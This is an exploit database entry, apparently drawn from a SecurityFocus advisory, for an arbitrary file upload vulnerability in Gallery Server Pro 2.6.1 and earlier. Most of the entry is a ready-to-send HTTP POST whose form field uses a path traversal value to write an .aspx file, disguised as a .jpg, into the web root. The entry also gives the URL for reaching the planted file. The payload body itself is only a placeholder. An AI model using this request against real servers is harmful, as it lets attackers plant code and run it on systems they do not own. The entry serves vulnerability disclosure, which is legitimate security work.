Gallery Server Pro - Arbitrary File Upload

Author: Drew Calcott
type: webapps
platform: php
port: 
date_added: 2013-05-14 
date_updated: 2015-10-22 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/59831/info

Gallery Server Pro is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Gallery Server Pro 2.6.1 and prior are vulnerable.

*********************************************************************
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1
Host: <vulnerablesite>
Referer:
http://www.example.com/gallery/default.aspx?g=task_addobjects&aid=2
Content-Length: 73459
Content-Type: multipart/form-data;
boundary=---------------------------41184676334
Cookie: <VALID COOKIE DATA>
Pragma: no-cache
Cache-Control: no-cache

-----------------------------41184676334
Content-Disposition: form-data; name="name"

..\..\gs\mediaobjects\Samples\malicious.aspx
-----------------------------41184676334
Content-Disposition: form-data; name="file"; filename="malicious.jpg"
Content-Type: application/octet-stream

Malicious code here.

-----------------------------41184676334--
*********************************************************************

The uploaded file will then be available on the affected server at:
http://www.example.com/gallery/gs/mediaobjects/Samples/malicious.aspx